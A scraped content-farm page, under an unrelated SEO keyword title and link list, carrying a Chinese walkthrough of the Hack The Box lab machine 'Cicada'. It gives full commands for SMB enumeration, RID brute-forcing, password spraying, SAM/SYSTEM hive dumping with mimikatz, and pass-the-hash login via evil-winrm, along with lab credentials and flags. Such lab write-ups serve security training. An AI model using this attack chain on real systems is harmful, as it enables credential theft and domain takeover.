当前位置: 首页 > news >正文

网站title keywords优优群排名优化软件

网站title keywords,优优群排名优化软件,做网站费用 优帮云,app是如何开发出来的目录 连接至HTB服务器并启动靶机 使用nmap对靶机进行开放端口扫描 使用nmap对靶机开放端口进行脚本、服务信息扫描 首先尝试空密码连接靶机SMB服务 由于不知道账户名#xff0c;这里我们使用crackmapexec对smb服务进行用户爆破 通过该账户连接至靶机SMB服务器提取敏感信…目录 连接至HTB服务器并启动靶机 使用nmap对靶机进行开放端口扫描 使用nmap对靶机开放端口进行脚本、服务信息扫描 首先尝试空密码连接靶机SMB服务 由于不知道账户名这里我们使用crackmapexec对smb服务进行用户爆破 通过该账户连接至靶机SMB服务器提取敏感信息 使用david.orelious用户凭证登录靶机SMB服务 使用evil-winrm通过上文凭证连接到靶机WinRM服务 USER_FLAG0c79a06b429a6c9144e52201714e6328 权限提升 尝试将注册表中的SAM、SYSTEM进行读取保存 ROOT_FLAGb7c206ec1a5f03f4de21e622502f4005 连接至HTB服务器并启动靶机 靶机IP10.10.11.35 分配IP10.10.16.22 使用nmap对靶机进行开放端口扫描 nmap -p- --min-rate1500 -sS -sU -Pn 10.10.11.35 将输出写入res.txt文件中并提取端口号存入变量ports ports$(cat res.txt | grep ^[0-9] | cut -d / -f 1 | tr \n , | sed s/,$//) 使用nmap对靶机开放端口进行脚本、服务信息扫描 nmap -p$ports -sCV 10.10.11.35 首先尝试空密码连接靶机SMB服务 smbclient -L 10.10.11.35 列出HR共享中的所有文件 smbclient -N \\\\10.10.11.35\\HR 将Notice from HR.txt文件下载到本地 get Notice from HR.txt 查看该文件内容 cat Notice from HR.txt 密码Cicada$M6Corpb*Lp#nZp!8 由于不知道账户名这里我们使用crackmapexec对smb服务进行用户爆破 crackmapexec smb 10.10.11.35 -u guest -p --rid-brute | grep SidTypeUser 将该输出保存到users.txt文件中再将所有用户名进行提取 cat users.txt | cut -f 2 -d \ | cut -f 1 -d | tee users.txt 使用上文拿到的密码对靶机账户进行密码喷洒 crackmapexec smb 10.10.11.35 -u users.txt -p Cicada$M6Corpb*Lp#nZp!8 由输出可见该密码对账户michael.wrightson生效 账户michael.wrightson 密码Cicada$M6Corpb*Lp#nZp!8 通过该账户连接至靶机SMB服务器提取敏感信息 crackmapexec smb 10.10.11.35 -u michael.wrightson -p Cicada$M6Corpb*Lp#nZp!8 --users 账户david.orelious 密码aRt$Lp#7t*VQ!3 使用david.orelious用户凭证登录靶机SMB服务 smbclient -U david.orelious //10.10.11.35/DEV 将Backup_script.ps1文件下载到本地 get Backup_script.ps1 查看该文件内容 cat Backup_script.ps1 账户emily.oscars 密码Q!3Lp#M6b*7t*Vt 使用evil-winrm通过上文凭证连接到靶机WinRM服务 evil-winrm -i 10.10.11.35 -u emily.oscars -p Q!3Lp#M6b*7t*Vt 进入C盘根目录 cd C:\ 查找user_flag位置 cmd.exe /c dir /s user.txt 可以看到有两个user.txt文件两个都查看内容发现是一样的 type C:\Documents and Settings\emily.oscars.CICADA\Desktop\user.txt type C:\Users\emily.oscars.CICADA\Desktop\user.txt *Evil-WinRM* PS C:\ type C:\Documents and Settings\emily.oscars.CICADA\Desktop\user.txt 0c79a06b429a6c9144e52201714e6328 *Evil-WinRM* PS C:\ type C:\Users\emily.oscars.CICADA\Desktop\user.txt 0c79a06b429a6c9144e52201714e6328 USER_FLAG0c79a06b429a6c9144e52201714e6328 权限提升 列出所有用户组 可以看到该用户具有文件备份特权(SeBackupPrivilege) 尝试将注册表中的SAM、SYSTEM进行读取保存 reg save hklm\sam sam reg save hklm\system system 利用这两个注册表文件抓取靶机管理员密码 .\mimikatz.exe lsadump::sam /sam:sam /system:system exit 账户Administrator 密码2b87e7c93a3e8a0ea4a581937016f341 利用该哈希值直接通过evil-winrm登录靶机 evil-winrm -i 10.10.11.35 -H 2b87e7c93a3e8a0ea4a581937016f341 -u Administrator 进入C盘根目录下 cd C:\ 查找root_flag位置 cmd.exe /c dir /s root.txt 查看root_flag内容 type C:\Users\Administrator\Desktop\root.txt *Evil-WinRM* PS C:\Users\Administrator\Documents cd C:\ *Evil-WinRM* PS C:\ cmd.exe /c dir /s root.txt  Volume in drive C has no label.  Volume Serial Number is 1B60-8905  Directory of C:\Documents and Settings\Administrator\Desktop 10/30/2024  04:30 PM                34 root.txt                1 File(s)             34 bytes  Directory of C:\Users\Administrator\Desktop 10/30/2024  04:30 PM                34 root.txt                1 File(s)             34 bytes      Total Files Listed:                2 File(s)             68 bytes                0 Dir(s)   1,663,627,264 bytes free *Evil-WinRM* PS C:\ type C:\Users\Administrator\Desktop\root.txt b7c206ec1a5f03f4de21e622502f4005 ROOT_FLAGb7c206ec1a5f03f4de21e622502f4005
http://www.dnsts.com.cn/news/20544.html

相关文章:

  • 3g免费网站策划公司招聘
  • 做网站应该学什么中国企业500强第一名是谁
  • 网站怎么更新内容建立网站对吗
  • 公众号授权网站抖音头像的网站制作教程
  • 网站备案表是什么wordpress邮件重置密码错误
  • 深圳做分销网站设计郑州建设局官方网站
  • 优化型网站建设公司网站模板大全
  • 广安建设厅官方网站动漫设计有前途吗
  • 商城网站功能介绍提高wordpress
  • 长沙网站设引进韩国电影
  • 筹划建设协会网站的方案义乌营销型网站建设
  • 网站 设计风格阜宁网站制作费用
  • 无锡网站制作哪家价格便宜跨境电商哪个平台好
  • 网站png小图标怎么做企业为什么要验资
  • 中国有哪些网站关键词排名查询工具有哪些
  • 网站建设维护费会计科目做网站时搜索的代码是什么
  • qq 互联网站开发代码西安搜索引擎优化
  • 辽阳住房和城乡建设网站用做网站使用的图片
  • 深圳商业网站建设推荐公司建设一个网站需要哪些硬件设备
  • 分类网站怎么做项目技能培训机构排名前十
  • 网站建设需要营业执照吗wordpress 获取所有菜单
  • 学网站开发去哪学网站开发记科目
  • 哪里建设网站最好用商品的销售网站总体设计
  • 附近有木有做网站如何制作购物网站
  • 市场调研分析报告seo难不难学
  • 做暧暧网站在线看鲁山网站建设
  • 网站手绘教程重庆刮刮卡制作
  • 公司 做网站关于机场建设的网站
  • 网站权重怎么做的世纪购网站开发招聘
  • 美橙表业手表网站奉贤青岛网站建设